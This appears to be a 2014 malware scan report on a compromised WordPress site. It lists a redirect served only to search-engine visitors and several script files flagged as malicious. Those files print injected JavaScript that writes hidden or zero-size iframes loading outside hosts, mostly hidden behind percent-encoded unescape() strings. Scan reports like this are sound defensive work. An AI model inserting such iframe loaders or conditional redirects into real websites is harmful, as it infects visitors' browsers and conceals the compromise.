Malicious/Suspicious Redirects
Request | Server response | Status |
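URL: http://nobsim.com/ (request imitating a visitor arriving from a search engine) GET / HTTP/1.1 Host: nobsim.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Sep 2014 12:29:24 GMT Location: http://nopillnosteel.com/ Server: nginx/1.6.2 Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL returns 200 OK in the page scan below, so the 301 appears to be served conditionally to requests that carry a search-engine Referer. A check that omits the Referer header may not reproduce it.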
Scanned pages/files
Request | Server response | Status |
http://nobsim.com/ | 200 OK Content-Length: 6479 Content-Type: text/html | clean |
http://nobsim.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 762 Content-Type: application/javascript | malicious |
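Malicious code - confirmed by antiviruses (see below):
document.write('<iframe src="http://condominioedificiobrasil.com/wp-includes/class-wp-ajax.php" width="13" height="14" frameborder="0" style="visibility: hidden; display: none"></iframe>');
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
Note: the first statement writes a hidden iframe (visibility: hidden; display: none) that loads class-wp-ajax.php from the wp-includes directory of a different domain. The two unescape() statements are identical; their percent-encoded argument decodes to a zero-width, zero-height iframe whose src is hxxp://xlolx[.]ru/a/q (defanged here). The same encoded statement pair follows the library code in the other scripts flagged as malicious in this report. The 762-byte response is far smaller than a jQuery library, so this file appears to have been replaced by the injected statements rather than appended to.
Antivirus reports: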
| ||
http://nobsim.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.8.16 | 200 OK Content-Length: 7101 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,j){function k(a,b){var d=a.nodeName.toLowerCase();if("area"===d){b=a.parentNode;d=b.name;if(!a.href||!d||b.nodeName.toLowerCase()!=="map")return false;a=c("img[usemap=#"+d+"]")[0];return!!a&&l(a)}return(/input|select|textarea|button|object/.test(d)?!a.disabled:"a"==d?a.href||b:b)&a document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.8.16 | 200 OK Content-Length: 58678 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(d,C){function M(){this.debug=false;this._curInst=null;this._keyEvent=false;this._disabledInputs=[];this._inDialog=this._datepickerShowing=false;this._mainDivId="ui-datepicker-div";this._inlineClass="ui-datepicker-inline";this._appendClass="ui-datepicker-append";this._triggerClass="ui-datepicker-trigger";this._dialogClass="ui-datepicker document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/?page_id=2 | 200 OK Content-Length: 9412 Content-Type: text/html | clean |
http://nobsim.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 1910 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.styl document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%6C%6F%6C%78%2E%72%75%2F%61%2F%71%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); Antivirus reports:
| ||
http://nobsim.com/?author=1 | 200 OK Content-Length: 6807 Content-Type: text/html | clean |
http://nobsim.com/?p=1 | 200 OK Content-Length: 10027 Content-Type: text/html | clean |
http://nobsim.com/?cat=1 | 200 OK Content-Length: 6755 Content-Type: text/html | clean |
http://nobsim.com/?m=201308 | 200 OK Content-Length: 6553 Content-Type: text/html | clean |
http://nobsim.com/wp-login.php | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://nobsim.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 12:29:36 GMT Location: http://nopillnosteel.com/ Server: nginx/1.6.2 Content-Length: 269 Content-Type: text/html; charset=iso-8859-1 | clean |
http://nopillnosteel.com/ | 500 Can't connect to nopillnosteel.com:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://nopillnosteel.com/test404page.js | 500 Can't connect to nopillnosteel.com:80 (Bad hostname) Content-Length: 166 Content-Type: text/plain | clean |
http://nobsim.com/?feed=rss2 | 200 OK Content-Length: 1526 Content-Type: text/xml | clean |
http://nobsim.com/?feed=comments-rss2 | 200 OK Content-Length: 1372 Content-Type: text/xml | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nobsim.com
Result: This site is not currently listed as suspicious. (A blacklist lookup reports only what the list operator has already detected; it does not contradict the malicious files found in the scan above.)
Query: http://yandex.com/infected?l10n=en&url=http://nobsim.com/
Result: nobsim.com is not infected or malware details are not published yet.